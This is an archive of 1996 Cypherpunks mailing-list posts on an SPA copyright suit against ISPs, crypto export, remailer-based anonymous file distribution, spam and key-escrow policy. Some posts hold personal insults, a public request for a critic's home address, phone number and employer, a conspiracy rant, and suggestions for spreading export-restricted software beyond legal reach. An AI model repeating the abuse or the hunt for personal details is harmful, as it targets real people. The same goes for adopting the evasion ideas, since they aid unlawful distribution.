"Bilderberg" agenda et al, then you look around and you see:

 1. No major daily newspaper in the U.S. takes any interest at all when
    these most powerful and influential people meet to discuss the fate
    of the world.  What a surprise, huh?

 2. The same people who get on TV a lot and smirk at conspiracies that
    might be believed in by the little people, don't have any trouble
    believing in the wildest, craziest, most unbelievable conspiracy
    of all, as long as it's politically correct, and brings in lots
    of cash.  Screw 'em.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 12 Oct 1996 22:40:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Tim May is a fine person.
In-Reply-To: <199610122356.QAA00286@miron.vip.best.com>
Message-ID: <99XPVD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May continues to use the anonymous remailers to praise himself in
third person - and what a strange person he is!

anonymous@miron.vip.best.com writes:
> ...                                        In short, Tim May is the top
> of the top, the best of the pest. ...
                              ^^^^

A very appropriate Freudian slip.

Timmy C. (for cretin) May is a cretin among cretins, a true imbecile.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 13 Oct 1996 00:39:11 -0700 (PDT)
To: Dimitri <dlv@bwalk.dm.com>
Subject: PHONE NUMBER
In-Reply-To: <99XPVD31w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961013001751.10101A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I can't seem to get a response to my offer from the usually
loquacious Dimitri.  If you know his phone number, I would
appreciate it if you would send it to me.  I'd like to chat with
him about coming to California to address a Cypherpunks meeting.
On Monday, I'll be talking to a travel agent to see about making
travel arrangements for Dimitri.  Some time next week I'll let
you all know what the estimated costs of the trip are and how
much I have Pledged.  We're moving right along so I think it's 
time that Dimitri and I ironed out the details of his visit.


 S a n d y

P.S.	Any other contact information about Dimitri, his
	employer's name, work phone, home address, etc.
	would be greatly appreciated.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Sun, 13 Oct 1996 03:24:10 -0700 (PDT)
To: Matthew Ghio <ghio@myriad.alias.net>
Subject: Re: SPA sues C2, other ISPs and users
Message-ID: <3.0b28.32.19961013032940.006d7c88@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 PM 10/12/96 -0400, Matthew Ghio wrote:
>gbroiles@netbox.com (Greg Broiles) wrote:
>
>> The SPA has apparently adopted two relatively aggressive litigation
>> strategies - putting ISP's in the position of disclosing otherwise
>> confidential customer information or being sued themselves, and treating
>> peripheral data about copyrighted works like copyrighted works themselves
>> (e.g., serial numbers). Particularly interesting is that they seem to be
>> claiming that a *link* to a pirate FTP site is itself infringing
>> (potentially contributory infringement).
>
>Claiming that a link to a pirate FTP site is illegal, is a fairly difficult
>position to defend.  It's not illegal to say "someone is selling stolen
>property on the corner of First Street downtown".  It's just a statement of
>fact.  They could try to argue that there was some intent to commit a
>crime... but they'd have to have some real proof of that.

We're not talking about a crime here, but a civil action. There is a
doctrine in copyright law called contributory infringement, whereby a party
who intentionally helps another party infringe on a third party's copyright
can be held liable as a contributory infringer.

In the Ninth Circuit, the standard for contributory infringement is "[o]ne
who, with knowledge of the infringing activity, induces, causes, or
materially contributes to the infringing conduct of another, may be held
liable as a 'contributory' infringer". _Fonovisa v. Cherry Auction_ 96
C.D.O.S. 517 (CA9, 1996) 
<http://ming.law.vill.edu/Fed-Ct/Circuit/9th/opinions/9415717.htm>, citing
to _Universal City Studios v. Sony Corp_, 659 F.2d 963, 975 (CA9, 1981),
rev'd on other grounds 464 U.S. 417 (1984), adopting the standard from
_Gershwin Publishing v. Columbia Artists_ 443 F.2d 1159 (CA2, 1971).
California is within the Ninth Circuit; I presume that the suit against C2
was filed in California (probably Oakland), but I might be wrong.

>Their claim that "peripheral data" is illegal is a rather novel idea, and
>not supported (to my knowledge) by precedent.  I don't think anyone could
>argue that a serial number or password is by itself worthy of copyright
>protection, since it lacks any creative expression, so they are claiming
>it is "indirect infringement".

Yes, this is the basic thrust of contributory infringement liability - that
the defendant had an important part to play in the fact that infringement
took place, without being the direct infringer. Contributory infringement
(and its kissing cousin, vicarious infringement, whereby a person under the
defendant's control infringes to the benefit of the defendant) are
supported by precedent and have been for several years.

For example:

_Fonovisa v. Cherry Auction_, supra, where defendant swap meet operator
leased space to vendors who sold illegitimate copies of musical works, and
defendant was aware that those sales were taking place, plaintiffs had
stated a claim for contributory infringement sufficient to survive
Fed.Rul.Civ.Pro 12(b)(6) motion. 

_Sega v. Maphia_ 857 F.Supp. 679 (N.D.Cal. 1994), where defendant BBS
sysops' role in "copying, including provision of facilities, direction,
knowledge and encouragement" was sufficient to establish a prima facie case
of contributory infringement;

_ITSI TV Productions v. Cal. Auth. of Racing Fairs_ 785 F.Supp. 854
(E.D.Cal. 1992), finding no domestic contributory infringement where
plaintiff had no evidence of defendant's mental state or knowledge with
respect to direct infringements allegedly facilitated in Mexico, and hence
no subject matter jurisdiction;

_Demetriades v. Kaufmann_ 690 F.Supp. 289 (S.D.N.Y. 1988), adopting the
_Gershwin_ standard, indicating ".. just as benefit and control are the
signposts of vicarious liability, so are knowledge and participation the
touchstones of contributory infringement", rejecting a theory of
contributory infringement against defendants who only made two phone calls
to ask about copying of architectural plans and did not provide the means
or facilities for the actual copying;

_Gershwin Publishing v. Columbia Artists Management_ 443 F.2d 1159 (CA2,
1971), finding contributory infringement where concert promoter generated
demand for concerts, collected fees from performers who foreseeably
performed copyrighted works without license, and collected payments from
independent organizations it created to produce those shows;  

The famous (well, sort of :) _Universal City Studios v. Sony_ case where
the Supreme Court ruled that "time-shifting" videotaping of TV shows was
not an infringement was based on a contributory infringement theory. It
would have been impractical for Universal City Studios to find and sue
individuals who taped occasional TV shows for later viewing; so instead
they went after someone worth suing, the people who made the VCRs. 

The language in the SPA's press release -

"Piracy has taken many forms on the Internet. These include making
unauthorized copies of software available for download, the posting of
serial numbers, cracker and hacker utilities and links to pirate FTP sites.
Although many believe piracy is limited to "warez" or illegal copies of
software, it extends beyond that narrow definition. Under the law, anyone
who knows -- or should have known -- of the infringement and who assists,
encourages or induces the infringement is liable for indirect infringement.
In each of the actions SPA filed, at least two of the above infringements
were present."

seems to imply that they may be thinking of contributory contributory
infringement - e.g., if (directly) distributing serial numbers or cracking
software is contributory infringement*, materially contributing to that
material contribution is also infringement. But this seems awfully
attenuated from the actual harm. (I don't see much controversy about the
idea that putting copyright-protected software up for FTP without the
copyright holder's permission is illegitimate; and the notion that merely
providing a link to someone else's site is infringement (or even a
"material contribution") seems to go much too far. Is a link to a site
which links to a site which infringes an infringement? How many links is
enough to escape liability? How many links are there between any two web
pages, cf. "six degrees of separation"? :)   

* (because it "materially contributes" to the creation of an unauthorized
copy, since the copy of a program being executed in RAM is distinct from an
on-disk copy and without cracking software or serial numbers there will be
no RAM copy and potentially no initial infringement. _MAI v. Peak_ 991 F.2d
511, 518 (CA9, 1993) cert dismissed 114 S.Ct. 671 (1994) and _Triad Systems
v. Southeastern Express_ 95 Daily Journal D.A.R. 11821, 95 CDOS 6890
(August 31, 1995), also see <http://www.io.com/~gbroiles/triad.html> for my
own crankiness about _Triad_) 

>A few months ago I saw Sameer grumbling about people "not paying for
>Apache-SSL".  Now SPA claims he's operating an ISP to promote piracy.  So
>first he's a software publisher and now he's a software pirate.  Uh, yeah,
>whatever.  Obviously SPA is on a PR campaign here which defies all
>conventional logic.

It looks to me like they're trying to achieve results through fear and
intimidation that they can't reach via persuasion; e.g., they are trying to
create a climate where ISP's turn over user information without a fuss
because they don't want to be sued themselves; and where users (and home
page "publishers" or authors) are afraid to even discuss infringement, or
do anything even close to the conceptual lines between fair use,
noncommercial alterations of works (a la _Galoob v. Nintendo_ 964 F.2d 965
(CA9, 1992), where defendants' marketed a "Game Genie" which altered the
play of Nintendo cartridges used in concert with it, held to be
noninfringing), and infringement. 

There are some situations where "cracker" software cannot be characterized
as inherently illegitimate - many people may want to disable copy
protection on software they've legitimately purchased (or "licensed", if
that's your view on the shrink wrap question) because it's annoying or
incompatible with their hardware configuration. A person with a legitimate
copy of software on CD-ROM may want to use it on their non-CD capable
laptop, or use it over a nonstandard network. For example, my legitimate
copy of Warcraft II won't run unless it sees its parent CD in my CD-ROM
drive; which means I can't start a music CD of my choice in the CD-ROM
drive and then run my legal copy of Warcraft. (But I probably should be
working anyway.)  Assuming the user is otherwise playing nicely (e.g., one
license per user, blah blah blah) there's no reason to think that disabling
copy protection is somehow illegitimate. 

But it's getting late. More tomorrow. 
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 12 Oct 1996 18:58:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
Message-ID: <199610130157.DAA16643@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back <aba@dcs.ex.ac.uk> wrote:
>The problem however, is finding a non-US site to hold the hot potato
>once it has been exported.  For example 128 bit Netscape beta was
>exported a while ago.  I don't see it on any non-US sites.

You didn't look vary hard.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 13 Oct 1996 03:55:41 -0700 (PDT)
To: Greg Broiles <ghio@myriad.alias.net>
Subject: Re: SPA sues C2, other ISPs and users
Message-ID: <3.0b19.32.19961013065552.00ed6354@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:34 AM 10/13/96 -0700, Greg Broiles wrote:
>In the Ninth Circuit, the standard for contributory infringement is "[o]ne
>who, with knowledge of the infringing activity, induces, causes, or
>materially contributes to the infringing conduct of another, may be held
>liable as a 'contributory' infringer". _Fonovisa v. Cherry Auction_ 96
>C.D.O.S. 517 (CA9, 1996) 

But how will a civil action be effective as soon as millions of people have
10 mb/s full-time net connections and can be their own ISPs and judgment
proof at the same time?

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 13 Oct 1996 05:40:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: PHONE NUMBER
In-Reply-To: <Pine.SUN.3.91.961013001751.10101A-100000@crl7.crl.com>
Message-ID: <25kqVD32w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:
> I can't seem to get a response to my offer from the usually
> loquacious Dimitri.

Not true. I already posted 2 responses. Your offer doesn't warrant more.

>                      If you know his phone number, I would
> appreciate it if you would send it to me.

Try whois dm.com.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 13 Oct 1996 08:28:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
Message-ID: <v02130503ae865897f409@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Steve Shear <azur@netcom.com> writes:
>> >The problem however, is finding a non-US site to hold the hot potato
>> >once it has been exported.  For example 128 bit Netscape beta was
>> >exported a while ago.  I don't see it on any non-US sites.  This is
>> >due to Netscape's licensing requirements, you need a license to be a
>> >netscape distribution site, the license doesn't include the right to
>> >mirror non-exportable versions on non-US sites.
>>
>> That's one good application for remailers, and .warez newsgroups. at.
>
>I don't know of any advertised files by email services using nym
>servers, where the file request, and the files are both sent via
>remailers.
>
>The problem with this is currently is that the nym servers couldn't
>stand up to the scrutiny if SPA or whoever got interested.  The
>message flood attack on the nym would reveal the services host.
>
>The BlackNet architecture solves this problem by posting requests
>encrypted with the services key to a newsgroup, but USENET newsgroup
>disitribution time is slow (*), and people are spoilt these days with
>WWW, and expect results now, not days later.

Has anyone tried this to see whether the LOS would or wouldn't be acceptable?

>
>The requested file can be posted via mixmaster.  You would want to use
>a different, random chain of remailers each time.  A reverse message
>flood could reveal the host also, as you can request lots of copies,
>and the service will blindly serve the files.  (If someone wants to
>discover the service host, they send 1000s of requests, then sit back
>and watch which user sends most data into the remailer net.)

On a related note:

I've been charged with developing an Internet service which needs to assure
its clients of anonymity.  However, we fear some clients may abuse the
service and we wish to prevent the abusers from re-enrollment if
terminated for misbehavior. (In your example, it would be the person(s)
trying to discover the service host via flood).

My thought was to base enrollment on some sort of 'blinding' of their
certified signature (e.g., from Verisign) which produces a unique result
for each signature but prevents the service from reconstructing the
signature itself (and thereby reveal the client's identity).  I'm calling
this negative authentication.

Have you come across anyone who has considered this problem or
another one which is mathematically very similar?

>
>To combat this the service could impose a limit on the number of
>copies it would serve per day.  This allows a denial of service
>attack, if someone wants to stop anyone else getting a copy, they just
>saturate the service.  Still an improvement over no limit.

If the service could negatively authenticate users it would need such
limits and might not be subject to such attack.

>
>Of course Ross Anderson's `eternity service' provides the general case
>solution for distribution of such data.  It is complex to implement
>well though.

I've never heard of the eternity service.  Where can I get more information?

BTW, would Eric Hughes' Universal Piracy System also solve such a
situation, by distributing or parking snippets of encrypted file data
across many 'cooperating' ftp (or whatever access/storage mechanism) sites.
Perhaps the negative authentication approach would help here too by
preventing flood/denial of service attacks against the 'key' sites.  If
only snippets of encrypted data are stored on any one host it might make
the SPA's goal even more elusive legally.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 13 Oct 1996 08:37:26 -0700 (PDT)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: SPA sues C2, other ISPs and users
Message-ID: <v02130504ae8659f2456b@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain



>>A few months ago I saw Sameer grumbling about people "not paying for
>>Apache-SSL".  Now SPA claims he's operating an ISP to promote piracy.  So
>>first he's a software publisher and now he's a software pirate.  Uh, yeah,
>>whatever.  Obviously SPA is on a PR campaign here which defies all
>>conventional logic.
>
>It looks to me like they're trying to achieve results through fear and
>intimidation that they can't reach via persuasion; e.g., they are trying to
>create a climate where ISP's turn over user information without a fuss
>because they don't want to be sued themselves; and where users (and home
>page "publishers" or authors) are afraid to even discuss infringement, or
>do anything even close to the conceptual lines between fair use,
>noncommercial alterations of works (a la _Galoob v. Nintendo_ 964 F.2d 965
>(CA9, 1992), where defendants' marketed a "Game Genie" which altered the
>play of Nintendo cartridges used in concert with it, held to be
>noninfringing), and infringement.

In Sameer's case they may not get far with forcing him to reveal user
identites since any one of them with intelligence is probably using ecash
or money orders for payment (something he encourages to protect anonymity).

Where's Eric Hughes' Universal Piracy System now that we need it?



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 13 Oct 1996 03:13:30 -0700 (PDT)
To: adam@homeport.org
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <199610121908.OAA19871@homeport.org>
Message-ID: <199610130802.JAA00335@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack <adam@homeport.org> writes:
> | (Adam Back wrote:)
> | >The new owner of the CAPI signatory key would need a good reputation,
> | >and presumably a policy of signing any (non-GAKked) CAPI modules
> | >signed by microsoft, and anything else that anyone wants signed.
> 
> 	How does a signer maintain a reputation if it will sign
> anything anyone wants signed?  I can see a business for a non-US
> company to certify a CSP and sign it, but thats not the same as
> anything MS signs, or anything anyone else wants signed.
> 
> 	There may be room for compitition here. :)

I wonder if MS would stand for competition on signing crypto modules.
They say (I think?) currently that they will not charge for the
service?  (Do I have this right?)

If they start charging for the service, they won't want competition.

What about patches of windows, are there non-reverse engineering terms
in the license?

Lots of windows apps do modifications of windows, 3rd party memory
managers, uninstall applications.  Or are these all working within
published microsoft APIs?

What exactly is microsoft certifying when they sign a CAPI module?

That it is quality crypto?  Has no obvious bugs?  That it won't crash
your system?

(I'm sure people have already exported signatures about the quality of
crypto: PGP signed list traffic by (US) people that looked at PGP
source, and found no flaws, etc).

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 13 Oct 1996 09:09:43 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: PHONE NUMBER
In-Reply-To: <25kqVD32w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961013085119.5642E-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 13 Oct 1996, Dimitri wrote:

> Sandy Sandfort <sandfort@crl.com> writes:
> > I can't seem to get a response to my offer from the usually
> > loquacious Dimitri.
> 
> Not true. I already posted 2 responses. Your offer doesn't
> warrant more.

Dimitri's two posts were non-responsive to the offer raised. 
Let's do it by the numbers, shall we, Dimitri?

1)	Do you agree to come to San Francisco and address a
	Cypherpunk meeting if your transportation and hotel 
	accomodations are provided?  Yes or No?  (see 3, below)

2)	When would you like to come out?  We usually have our
	monthly meetings on the second Saturday, but I'm sure we
	could change that, if necessary, for your convenience.
	Please state a specific date or dates you can fly.
	(see 3, below)

3)	Are there any issues/details you need to have resolved
	before you can give final answers to (1) and (2), above?
	If so, what are they?  Please be specific.

Clear enough?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 13 Oct 1996 07:35:42 -0700 (PDT)
To: Matthew Ghio <ghio@myriad.alias.net>
Subject: Re: SPA sues C2, other ISPs and users
In-Reply-To: <199610130045.UAA03900@myriad>
Message-ID: <199610131452.JAA14215@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <199610130045.UAA03900@myriad>, on 10/12/96 at 08:45 PM,
   Matthew Ghio <ghio@myriad.alias.net> said:

>A few months ago I saw Sameer grumbling about people "not paying for
>Apache-SSL".  Now SPA claims he's operating an ISP to promote piracy.  So first he's
>a software publisher and now he's a software pirate.  Uh, yeah, whatever.  Obviously
>SPA is on a PR campaign here which defies all
>conventional logic.

There is an old rule of thumb: Follow the money.

SPA is backed by big money corperations including: IBM, MicroSoft, NetScape, & Novell.

All of these corporations are in direct compition with Sameer and Apache-SSL. I beleive that Sameer has a comercial web server also but the name illudes me at this time. All of these corporations have strong intrest in damaging Sameer's reputation and also hurting him finacialy.


When in doubt always follow the money!

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: What I like about MS is its loyalty to customers!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 13 Oct 1996 22:44:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: RE: Binding cryptography - a fraud-detectible alternative to
Message-ID: <199610140543.WAA19753@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:48 AM 10/13/96 +0000, everheul@mail.rijnhaave.nl wrote:
>To  explain the backround of "binding cryptography" once more; with
>respect to (interoperable, worldwide) security in the information
>society socities/governments have to achieve two tasks: 1. 
>stimulating the establishment of a security structure that protects
>their citizens, but which does not aid criminals. 2. Coping with the
>use of encryption by criminals outside of this framework.

Clearly curtains aid criminals.

One way of allowing private citizens to have privacy from their 
neighbors while still enabling legitimate government supervision
of citizen units would be to have microphones and observation
cameras in every home and shop that can be activated by the government
without the citizen units knowledge, thus allowing citizens full
curtain enabled privacy without interfering with legitmate government
security interests.

This will also help the government protect the citizen unit from 
exposure to dangerous and harmful thoughts and ideas.

Present efforts to inclulcate children with a correct outlook on life
are often frustrated by subversive, racist, or anti social teachings
at home.   This measure could help citizen units to ensure that their
speech is sensitive to the concerns of minorities and oppressed groups
and to current government views.

Since many shopkeepers already have such devices in their shop, there
is ample precedent for this system. 

A good start on such a system would be have the existing shop devices
run to the police instead of the shopkeeper.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sun, 13 Oct 1996 11:04:10 -0700 (PDT)
To: raph@cs.berkeley.edu
Subject: Re: pgp, edi, s/mime
Message-ID: <199610131805.LAA11401@crypt>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the kind words about my participation with PGP Inc.  My comment
was really meant more as a disclaimer, though.  Realize that I am now
a corporate employee in the field rather than a hobbyist, so set your
mental filters accordingly.

Also, my activities right now are mostly a matter of helping with the
finishing touches.  Hard work over the past couple of years by Colin
Plumb and Derek Atkins has produced the bulk of the code base for PGP
3 and the follow-on products.

Still it is very exciting and gratifying for me to be working in this
field which I love and which is so important, and I am enjoying it
very much.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sun, 13 Oct 1996 11:22:21 -0700 (PDT)
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Fuck Cyberpromo
In-Reply-To: <v03007801ae85b0546a74@[206.119.69.46]>
Message-ID: <961013.110713.0h2.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, rah@shipwright.com writes:

> It seems to me that every time I send a message to cypherpunks, I get a 10k
> message entitled "RESPONSE FROM CYBERPROMO" from "abusebot@savetrees.com
> (Mail AutoResponder)" .

I wonder if a 'who cypherpunks' would disclose a subscription from
abusebot@savetrees.com?

> So. The messages all say send complaints to wallace@cyberpromo.com . That's
> what I'm going to do. With every message I get from cyberpromo from now on.

I'm already doing that.  I began with the very first one I received, and
instructed him to block all mail to my two domains.  After 3, I began
invoicing Mr. Wallace $25 per message.  His bill is up to $100 right
now.  I expect it will go higher (although the snail mail copy _might_
get more attention than the email).

Anyone on the list know of a good, heavy-handed collection agency that
would like to take this when it tops, say, $500?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmEVJhvikii9febJAQHjsgP9GxzF6SxzbHEAlxsC7tb1d0ZMit9Bz8AQ
iYBHJfpRTtKoufekiO4WyIT+BKL03D1FRL0mmjRw0JJ7Zgj4PAhSuUgJVGMOPTUC
sz2VsQVtwHDLZCMys/9EjfoNkQbr7l53j9xRL5QKc5xC92ZBSBd+7zLVUQSs6/CJ
prK6cOKi3Mo=
=YbHx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 13 Oct 1996 11:17:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Op-Ed piece
Message-ID: <v02130501ae867e26c70b@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


We all complain how the media are actively ignoring the crypto issues
during the campaign.  Here's a chance for us to quickly do something with
some impact beyond our group.

I'm looking insert an (1000-2000 word) op-ed piece or letter to the editor
in my local Sunday paper presenting a non-technical,
Libertarian/cypherpunk, view of the present crypto situation, our
objections to the government's proposals, etc.  Does anyone have a
suggestion on where to find such an animal?  I'd rather not spend the next
day or two writing one.

Perhaps we could coordinate a plan to have the same piece inserted next
Sunday in various newspapers.

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 14 Oct 1996 00:09:52 -0700 (PDT)
To: Tom Lojewski <cypherpunks@toad.com
Subject: Re: Clinternet?
Message-ID: <199610140708.AAA24799@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:29 PM 10/13/96 -0700, Tom Lojewski wrote:
>
> How do I get off this list?

send the message "help" to the robot at majordomo@toad.com

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 13 Oct 1996 11:49:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: RE: Binding cryptography - a fraud-detectible alternative to
Message-ID: <199610131846.LAA20382@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:48 AM 10/13/96 +0000, everheul@mail.rijnhaave.nl wrote:
>To  explain the backround of "binding cryptography" once more; with
>respect to (interoperable, worldwide) security in the information
>society socities/governments have to achieve two tasks: 1. 
>stimulating the establishment of a security structure that protects
>their citizens, but which does not aid criminals.

I think this is a phony distinction.   Practically every product sold today 
could arguably "aid criminals."  It isn't possible to prevent this.  And 
that's the problem with your thinking above:  If government argued that it 
had the authority to regulate any product that, arguably, "aided criminals," 
then it would automatically be able to regulate anything.


> 2. Coping with the
>use of encryption by criminals outside of this framework.
>
>An inherent problem with these tasks is that different
>socities/governments have different views on the matter.

Given that item we just read about Burma illegalizing the non-authorized use 
of fax machines and modems, that is a vast understatement!


> So to achieve
>the first task you'll need a concept behind the security structure
>that is flexible enough to incorporate *any* crypto policy, i.e. from
>liberal (Japan) to non-liberal (France).

Just a second!  WHy should technology bow to government policy?  Until now, 
the microcomputer industry has pretty much developed and sold products 
without much or any (?) regard for what governmental policy would desire.  
In fact, it isn't even clear that governments have had much opinion about 
the direction that the microcomputer markets should go.  Why should we start 
adjusting business policies and product capabilities in a way which is 
hostile to customers, just because the government wants this?

> We believe that  "binding
>cryptography" is flexible enough to achieve this: a liberal crypto
>policy might use no Trusted Retrieval Parties at all, while a very
>non-liberal country might want one (government controlled) TRP, a
>compliance check on all network traffic and a ban on other crypto.

Why not ___NOT___ help these guys out?  Do they somehow deserve to be 
assisted in the subjugation of their people?  Does the name "Zyklon B" ring 
a bell?

>With binding cryptography the issue on a crypto policy becomes
>non-technical and politically debatable: which features does a country
>want and what implementation?

I would much prefer a situation where freedom is provided and/or guaranteed 
by technology, and it is NOT debateable!  See, one problem is that contrary 
you your implication above, where you said that crypto policy becomes 
"politically debateable" (which implies that the ordinary people of a 
country have some input) the _reality_ is that any such decision will be 
made by a tiny number of bureaucrats, if they can get away with it.  The US 
Clipper proposal was a classic example of this:  There was absolutely no 
public discussion or debate on it before it was announced, and it was 
obviously intended to be a fait accompli.   Further, nearly all 
non-governmental people who are aware of the crypto issue disagree with the 
government's policies in this matter.  Clearly, you cannot imply that crypto 
will REALLY be "politically debateable"!


>> For this kind of application, binding cryptography is spot on.
>Jim bell[SMTP:jimbell@pacifier.com] wrote:
